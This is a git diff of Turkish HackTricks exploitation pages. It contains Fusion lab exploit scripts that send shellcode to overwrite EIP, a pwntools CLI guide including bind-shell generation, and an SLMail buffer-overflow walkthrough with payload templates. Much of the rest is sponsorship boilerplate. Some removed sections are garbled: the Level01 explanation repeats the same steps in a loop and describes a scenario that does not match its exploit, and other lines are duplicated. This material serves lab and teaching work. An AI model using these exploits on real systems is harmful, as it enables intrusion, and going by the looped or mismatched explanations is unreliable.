* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katıl veya [**telegram grubuna**](https://t.me/peass) katıl veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip et.**
* **Hacking püf noktalarını paylaşmak için PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulun.
</details>
{% endhint %}
Eğer bir metni RC4 kullanarak şifreleyebilirseniz, aynı şifreleme işlevini kullanarak o RC4 ile şifrelenmiş herhangi bir içeriği deşifre edebilirsiniz (aynı şifreyi kullanarak).
Eğer bir metni RC4 kullanarak şifreleyebilirseniz, aynı şifreleme fonksiyonunu kullanarak o RC4 ile şifrelenmiş herhangi bir içeriği deşifre edebilirsiniz (aynı şifreyi kullanarak).
Bir bilinen bir metni şifreleyebilirseniz, aynı zamanda şifreyi de çıkarabilirsiniz. Daha fazla referans HTB Kryptos makinesinde bulunabilir:
Bilinen bir metni şifreleyebilirseniz, aynı zamanda şifreyi de çıkarabilirsiniz. Daha fazla referans HTB Kryptos makinesinde bulunabilir:
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
{% embed url="https://0xrick.github.io/hack-the-box/kryptos/" %}
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter'da** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
</details>

View file

@ -1,33 +1,35 @@
# E-posta Güvenlik Açıkları
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da takip edin**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek** paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.**
</details>
{% endhint %}
##
##
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme konusunda sıfırdan kahramana dönüşmek için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>'ı öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'i desteklemenin diğer yolları:
* Şirketinizi HackTricks'te **reklamını görmek** veya HackTricks'i **PDF olarak indirmek** için [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* Özel [**NFT'lerden**](https://opensea.io/collection/the-peass-family) oluşan koleksiyonumuz [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'i keşfedin
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)'da takip edin**
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek** paylaşın.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek HackTricks ve HackTricks Cloud github depolarına katkıda bulunun.**
</details>
{% endhint %}

View file

@ -1,23 +1,23 @@
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmak için</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> ile öğrenin!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
# Level00
[http://exploit-exercises.lains.space/fusion/level00/](http://exploit-exercises.lains.space/fusion/level00/)
1. EIP'yi değiştirmek için ofset alın
1. EIP'yi değiştirmek için ofseti alın
2. EIP'ye shellcode adresini yerleştirin
```python
from pwn import *
@ -45,32 +45,6 @@ r.send(buf)
r.interactive()
```
# Seviye01
## Açıklama
Bu seviyede, `fusion` adlı bir SUID dosyasını hedef alacağız. Bu dosya, `level01` kullanıcısının yetkileriyle çalıştırıldığında `level02` kullanıcısının yetkilerine sahip olacak şekilde ayarlanmıştır. Amacımız, `level02` kullanıcısının yetkilerini elde etmek için `fusion` dosyasını kullanmaktır.
## Saldırı Yöntemi
1. İlk adım olarak, `fusion` dosyasının SUID özelliğini kontrol edin. SUID özelliği, bir dosyanın sahibi tarafından belirlenen kullanıcının yetkileriyle çalıştırıldığında, dosyanın geçici olarak sahibinin yetkilerine sahip olmasını sağlar. Bu durumda, `fusion` dosyası `level02` kullanıcısının yetkilerine sahip olacak şekilde ayarlanmıştır.
2. `fusion` dosyasını çalıştırarak `level02` kullanıcısının yetkilerini elde edin. Bu dosya, bir argüman olarak aldığı metni birleştirir ve ardından `system()` fonksiyonunu kullanarak bu metni bir komut olarak çalıştırır. Bu nedenle, `fusion` dosyasını çalıştırırken, bir komutu çalıştırmak için bir argüman sağlamamız gerekmektedir.
3. `fusion` dosyasını çalıştırırken, bir komutu çalıştırmak için bir argüman sağlamak için, bir komutu çalıştıracak olan metni birleştirmemiz gerekmektedir. Bu metni birleştirirken, `level02` kullanıcısının yetkilerini elde etmek için bir komut eklememiz gerekmektedir.
4. `fusion` dosyasını çalıştırırken, bir komutu çalıştırmak için bir argüman sağlamak için, bir komutu çalıştıracak olan metni birleştirmemiz gerekmektedir. Bu metni birleştirirken, `level02` kullanıcısının yetkilerini elde etmek için bir komut eklememiz gerekmektedir.
5. `fusion` dosyasını çalıştırarak `level02` kullanıcısının yetkilerini elde edin. Bu dosya, bir argüman olarak aldığı metni birleştirir ve ardından `system()` fonksiyonunu kullanarak bu metni bir komut olarak çalıştırır. Bu nedenle, `fusion` dosyasını çalıştırırken, bir komutu çalıştırmak için bir argüman sağlamamız gerekmektedir.
6. `fusion` dosyasını çalıştırırken, bir komutu çalıştırmak için bir argüman sağlamak için, bir komutu çalıştıracak olan metni birleştirmemiz gerekmektedir. Bu metni birleştirirken, `level02` kullanıcısının yetkilerini elde etmek için bir komut eklememiz gerekmektedir.
7. `fusion` dosyasını çalıştırarak `level02` kullanıcısının yetkilerini elde edin. Bu dosya, bir argüman olarak aldığı metni birleştirir ve ardından `system()` fonksiyonunu kullanarak bu metni bir komut olarak çalıştırır. Bu nedenle, `fusion` dosyasını çalıştırırken, bir komutu çalıştırmak için bir argüman sağlamamız gerekmektedir.
8. `fusion` dosyasını çalıştırırken, bir komutu çalıştırmak için bir argüman sağlamak için, bir komutu çalıştıracak olan metni birleştirmemiz gerekmektedir. Bu metni birleştirirken, `level02` kullanıcısının yetkilerini elde etmek için bir komut eklememiz gerekmektedir.
9. `fusion` dosyasını çalıştırarak `level02` kullanıcısının yetkilerini elde edin. Bu dosya, bir argüman olarak aldığı metni birleştirir ve ardından `system()` fonksiyonunu kullanarak bu metni bir komut olarak çalıştırır. Bu nedenle, `fusion` dosyasını çalıştırırken, bir komutu çalıştırmak için bir argüman sağlamamız gerekmektedir.
10. `fusion` dosyasını çalıştırırken, bir komutu çalıştırmak için bir argüman sağlamak için, bir komutu çalıştıracak olan metni birleştirmemiz gerekmektedir. Bu metni birleştirirken, `level02` kullanıcısının yetkilerini elde etmek için bir komut eklememiz gerekmektedir.
```python
from pwn import *
@ -96,16 +70,17 @@ buf += "\x65\xd9\x0f\x01"
r.send(buf)
r.interactive()
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek isterseniz** veya **HackTricks'i PDF olarak indirmek isterseniz** [**ABONELİK PLANLARINA**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **pull request göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}

View file

@ -1,45 +1,33 @@
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud** github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına katkıda bulunun.**
</details>
{% endhint %}
```
pip3 install pwntools
```
# Pwn asm
Satırdan veya dosyadan opcode'ları alın.
```python
from pwn import asm
# Satırdan opcode almak için
opcode = asm("mov eax, 0")
# Dosyadan opcode almak için
with open("shellcode.asm", "r") as f:
opcode = asm(f.read())
```
`asm` fonksiyonu, verilen assembly kodunu opcode'larına dönüştürür. Satır veya dosya olarak verilen assembly kodunu işleyebilirsiniz.
Satır veya dosyadan opcode'ları al.
```
pwn asm "jmp esp"
pwn asm -i <filepath>
```
**Seçebilirsiniz:**
* çıktı türü (ham, hex, dize, elf)
* çıktı dosyası bağlamı (16,32,64,linux,windows...)
* baytları atlayabilirsiniz (yeni satırlar, null, bir liste)
* çıktıyı çalıştırmak için gdb kullanarak hata ayıklama kabuk kodlayıcısını seçebilirsiniz
* çıktı türü (ham,hex,dize,elf)
* çıktı dosya bağlamı (16,32,64,linux,windows...)
* baytları önle (yeni satırlar, null, bir liste)
* gdb kullanarak hata ayıklama kabuk kodunu seçin
# **Pwn checksec**
@ -56,40 +44,40 @@ Bir desen alın
pwn cyclic 3000
pwn cyclic -l faad
```
**Seçebilirsiniz:**
**Seçebilir:**
* Kullanılan alfabe (varsayılan olarak küçük harfler)
* Benzersiz desen uzunluğu (varsayılan olarak 4)
* Bağlam (16,32,64,linux,windows...)
* Offset alın (-l)
* Benzersiz desen uzunluğu (varsayılan 4)
* bağlam (16,32,64,linux,windows...)
* Offset al (-l)
# Pwn hata ayıklama
Bir işleme GDB'yi bağlayın
Bir işleme GDB'yi ekle
```
pwn debug --exec /bin/bash
pwn debug --pid 1234
pwn debug --process bash
```
**Seçebilirsiniz:**
**Seçebilir:**
* Yürütülebilir dosya, isim veya pid bağlamına göre (16,32,64,linux,windows...)
* Yürütülecek gdbscript
* Sysrootpath
* Yürütülebilir dosya, ada veya pid bağlamına göre (16,32,64,linux,windows...)
* Yürütmek için gdbscript
* sysrootpath
# Pwn disablenx
Bir ikili dosyanın nx'ini devre dışı bırakın
Bir ikilinin nx'ini devre dışı bırakın
```
pwn disablenx <filepath>
```
# Pwn disasm
Hex opcode'ları disassemble et.
Hex opcodes'ı disassemble etmek
```
pwn disasm ffe4
```
**Seçenekler:**
**Seçebilir:**
* bağlam (16,32,64,linux,windows...)
* temel adres
@ -97,42 +85,27 @@ pwn disasm ffe4
# Pwn elfdiff
2 dosya arasındaki farkları yazdırır
2 dosya arasındaki farkları yazdır
```
pwn elfdiff <file1> <file2>
```
# Hexadecimal Temsilini Ele Geçir
# Hex'i ele geçir
Onaltılık temsili elde etmek için kullanılır.
Onaltılık temsil alın
```bash
pwn hex hola #Get hex of "hola" ascii
```
# Pwn phd
Hexdump alın
```python
from pwn import *
# Create a connection to the target
conn = remote('target.com', 1337)
# Receive data from the target
data = conn.recv()
# Print the hexdump of the received data
hexdump(data)
```
Bu kod parçası, `pwn` kütüphanesini kullanarak hedefe bağlantı oluşturur ve hedeften veri alır. Alınan verinin hexdump'ını ekrana yazdırır.
```
pwn phd <file>
```
**Seçebilirsiniz:**
**Seçebilir:**
* Gösterilecek bayt sayısı
* Satır başına düşen bayt sayısı
* Başlangıçta atlanacak baytlar
* Başlangıçta atlanacak bayt sayısı
* Satır başına vurgulanacak bayt sayısı
# Pwn pwnstrip
@ -140,7 +113,7 @@ pwn phd <file>
# Pwn shellcraft
Shell kodlarını alın
Shellcodları al
```
pwn shellcraft -l #List shellcodes
pwn shellcraft -l amd #Shellcode with amd in the name
@ -151,27 +124,27 @@ pwn shellcraft .r amd64.linux.bindsh 9095 #Bind SH to port
**Seçebilirsiniz:**
* shellcode ve shellcode için argümanlar
* Çıktı dosyası
* çıktı formatı
* Çıkış dosyası
* çıkış formatı
* hata ayıklama (shellcode'a dbg ekle)
* önce (koddan önce hata ayıklama tuzağı)
* önce (kod öncesi hata ayıklama tuzak)
* sonra
* opcode kullanmaktan kaçının (varsayılan: null ve yeni satır kullanmayın)
* Shellcode'u çalıştırın
* opcode'ları kullanmaktan kaçının (varsayılan: null ve yeni satır kullanılmaz)
* Shellcode'u çalıştır
* Renkli/renksiz
* sistem çağrılarını listele
* mümkün olan shellcode'ları listele
* Paylaşılan bir kitaplık olarak ELF oluşturun
* olası shellcodeları listele
* Paylaşılan kütüphane olarak ELF oluştur
# Pwn şablonu
Bir Python şablonu alın
Bir Python şablonu al
```
pwn template
```
**Seçebilirsiniz:** host, port, kullanıcı, şifre, yol ve sessiz
**Seçebilirsiniz:** ana bilgisayar, port, kullanıcı, şifre, yol ve sessiz
# Unhex Pwn
# Pwn unhex
Hex'ten dizeye
```
@ -183,16 +156,17 @@ Pwntools'u güncellemek için
```
pwn update
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hackleme becerilerini sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamınızı görmek veya HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi HackTricks ve HackTricks Cloud github depolarına PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR göndererek HackTricks** ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github depolarına katkıda bulunun.**
</details>
{% endhint %}

View file

@ -1,55 +1,29 @@
# Windows Exploiting (Temel Kılavuz - OSCP seviyesi)
{% hint style="success" %}
AWS Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve uygulayın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
<summary>HackTricks'i Destekleyin</summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek** veya **HackTricks'i PDF olarak indirmek** için [**ABONELİK PLANLARI'na**](https://github.com/sponsors/carlospolop) göz atın!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) **katılın** veya **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'ı takip edin**.
* **Hacking hilelerinizi** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına **PR göndererek paylaşın**.
* [**Abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarını paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
{% endhint %}
## **SLMail servisini kurmaya başlayın**
## SLMail servisini yeniden başlatın
Her seferinde **SLMail servisini yeniden başlatmanız gerektiğinde**, bunu Windows konsolunu kullanarak yapabilirsiniz:
Her seferinde **SLMail servisini yeniden başlatmanız gerektiğinde** bunu windows konsolunu kullanarak yapabilirsiniz:
```
net start slmail
```
## Çok temel bir python saldırı şablonu
```python
#!/usr/bin/env python3
import socket
# Target IP and Port
target_ip = "192.168.1.10"
target_port = 1337
# Create a socket object
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Connect to the target
s.connect((target_ip, target_port))
# Craft the payload
payload = b"A" * 100
# Send the payload
s.send(payload)
# Close the connection
s.close()
```
Bu şablon, hedef bir IP adresi ve port numarası üzerinde çalışan bir hedefe basit bir saldırı gerçekleştirmek için kullanılabilir. Saldırı, bir TCP soketi oluşturarak başlar ve hedefe bağlanır. Ardından, belirli bir boyutta bir payload oluşturulur ve hedefe gönderilir. Son olarak, bağlantı kapatılır.
## Çok temel python saldırı şablonu
```python
#!/usr/bin/python
@ -75,7 +49,7 @@ print "Could not connect to "+ip+":"+port
`Options >> Appearance >> Fonts >> Change(Consolas, Bold, 9) >> OK` yolunu izleyin.
## **İşlemi Immunity Debugger'a Ekleyin:**
## **İşlemi Immunity Debugger'a Bağlama:**
**File --> Attach**
@ -83,23 +57,23 @@ print "Could not connect to "+ip+":"+port
**Ve START düğmesine basın**
## **Exploit'i gönderin ve EIP'nin etkilenip etkilenmediğini kontrol edin:**
## **Saldırıyı gönderin ve EIP'nin etkilenip etkilenmediğini kontrol edin:**
![](<../.gitbook/assets/image (25) (1) (1).png>)
Her seferinde hizmeti kırdığınızda, bu sayfanın başında belirtildiği gibi yeniden başlatmanız gerekmektedir.
Servisi her durdurduğunuzda, bu sayfanın başında belirtildiği gibi yeniden başlatmanız gerekmektedir.
## EIP'yi değiştirmek için bir desen oluşturun
Desen, önceden hizmeti kırmak için kullandığınız tampon kadar büyük olmalıdır.
Desen, önceki servisi durdurmak için kullandığınız tampon kadar büyük olmalıdır.
![](<../.gitbook/assets/image (26) (1) (1).png>)
```
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000
```
Exploitin tamponunu değiştirin ve deseni ayarlayın ve saldırıyı başlatın.
Değiştirin exploitin tamponunu ve deseni ayarlayın ve exploit'i başlatın.
Yeni bir çökme meydana gelmelidir, ancak farklı bir EIP adresiyle:
Yeni bir çökme oluşmalı, ancak farklı bir EIP adresi ile:
![](<../.gitbook/assets/image (27) (1) (1).png>)
@ -109,13 +83,13 @@ Adresin deseninizde olup olmadığını kontrol edin:
```
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 39694438
```
Görünüşe göre, tamponun EIP'sini 2606 ofsetinde değiştirebiliriz.
Görünüşe göre **tamponun 2606 ofsetindeki EIP'yi değiştirebiliriz**.
Exploitin tamponunu değiştirerek kontrol edin:
Exploit'in tamponunu değiştirerek kontrol edin:
```
buffer = 'A'*2606 + 'BBBB' + 'CCCC'
```
